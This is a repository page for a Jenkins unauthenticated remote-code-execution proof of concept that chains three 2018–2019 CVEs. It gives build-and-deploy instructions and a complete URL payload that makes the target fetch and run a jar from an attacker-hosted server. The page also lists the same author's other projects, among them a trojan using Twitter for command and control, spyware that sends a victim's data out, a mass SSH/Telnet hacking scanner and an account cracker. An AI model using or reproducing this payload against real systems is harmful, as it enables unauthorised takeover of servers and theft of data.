• Stars
    star
    294
  • Rank 141,303 (Top 3 %)
  • Language
    Java
  • Created almost 6 years ago
  • Updated over 5 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

๐Ÿ˜ˆ Jenkins RCE PoC. From unauthenticated user to remote code execution, it's a hacker's dream!
JENKINS UNAUTHENTICATED REMOTE CODE EXECUTION
---------------------------------------------

Exploit compiled by me, but full credits for exploit discovery and exploit chaining go to Orange Tsai (orange.tw).

It chains CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029 to a more reliable and elegant pre-auth remote code execution!

Read his write-ups on this exploit here -
Part 1: https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html
Part 2: http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
His github: https://github.com/orangetw


INSTRUCTIONS:
-------------
- Edit code/Payload.java to your specifications, then run build.sh to generate a jar and copy it to the web folder.
- Once that is finished, copy the inner contents of www/ to a webserver.
- In the URL payload, replace <TARGET HOST> with the hostname of the server, and <EXPLOIT HOST> to the hostname of where you uploaded your files.


URL Payload:
------------
http://<TARGET HOST>/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='payload', root='http://<EXPLOIT HOST>')%0a
@Grab(group='package', module='payload', version='1')%0a
import Payload;

More Repositories

1

Emotion

๐Ÿ˜„ Recognizes human faces and their corresponding emotions from a video or webcam feed. Powered by OpenCV and Deep Learning.
Python
447
star
2

Pine

๐ŸŒฒ Aimbot powered by real-time object detection with neural networks, GPU accelerated with Nvidia. Optimized for use with CS:GO.
Python
439
star
3

GoAT

๐Ÿ GoAT (Golang Advanced Trojan) is a trojan that uses Twitter as a C&C server
Go
261
star
4

tts

๐Ÿ“ ๐Ÿ”‰ A simple text-to-speech tool. Converts your text to speech with any of StreamElements voices. Frontend built with Gatsby.
JavaScript
158
star
5

Knock

๐Ÿ”‘ Scan the entire internet for SSH and Telnet services. Then hack them.
JavaScript
76
star
6

Pad

๐Ÿ““ An online, collaborative, real-time notepad built with WebSockets and NodeJS
JavaScript
45
star
7

bandcamp-ripper

๐ŸŽต Rips MP3 files from Bandcamp album URL's
Python
44
star
8

Donut

๐Ÿค– A JavaScript implementation of the infamous "donut.c" program
JavaScript
40
star
9

A-picture-of-Jeff-Goldblum

๐Ÿ’ฏ This repository is a picture of Jeff Goldblum
Ruby
35
star
10

Wizardli

๐Ÿš€ An ultra fast YouTube-to-MP3 downloader and transcoder
TypeScript
24
star
11

MusicalFractals

โœจ Generates 3D, animated fractals by analyzing the waveform of audio files
JavaScript
24
star
12

BitBuster

๐Ÿ”‘ Multi-threaded Instagram account cracker
Go
17
star
13

BoilerChat

๐ŸŽ’ BoilerChat is a live, anonymous, online chatroom for Purdue students.
JavaScript
13
star
14

WhoHackedMe

๐Ÿ” Instantly search the web for hacked data. Check if you appear in any database leaks.
JavaScript
13
star
15

react-bootstrap-webpack-Boilerplate

Start any web project with ease by using this React, Webpack, Bootstrap, and Babel boilerplate!
JavaScript
9
star
16

resume

Thank you kanye, very cool!
6
star
17

Reverb

๐Ÿ”ฅ An audio visualizer built on the Web Audio API
JavaScript
5
star
18

netpaste

A command line pastebin accessible through netcat
Go
4
star
19

livespy

LiveSpy monitors a victims computer and sends sensitive information to the hacker. Written with Go and Websockets.
HTML
4
star
20

VaporwaveText

A simple React app to convert "normal text" to "๏ฝ–๏ฝ๏ฝ๏ฝ๏ฝ’๏ฝ—๏ฝ๏ฝ–๏ฝ…ใ€€๏ฝ”๏ฝ…๏ฝ˜๏ฝ”"
JavaScript
4
star
21

string2bf

Converts a string to Brainf**k code
Go
2
star
22

Transform

An HTML5 game that challenges the mind!
JavaScript
2
star
23

Boilermake2018

Boilermake 2018 hackathon repo
JavaScript
2
star
24

AimbotCalvin

Website for TSM Aimbot Calvin
JavaScript
2
star
25

superkey

CODE39 brute forcer
HTML
1
star
26

draw.io

1
star
27

dingus

Vidya game
JavaScript
1
star
28

yf-downloader

Export data from Yahoo Finance to Excel spreadsheets
Jupyter Notebook
1
star
29

RedditBrowser

A simple full screen image and video browser for Reddit
JavaScript
1
star
30

sudoku-solver

A simple sudoku solver written in Go
Go
1
star
31

PyScrape

A super fast web crawling (slithering?) email scraper written entirely in Python.
Python
1
star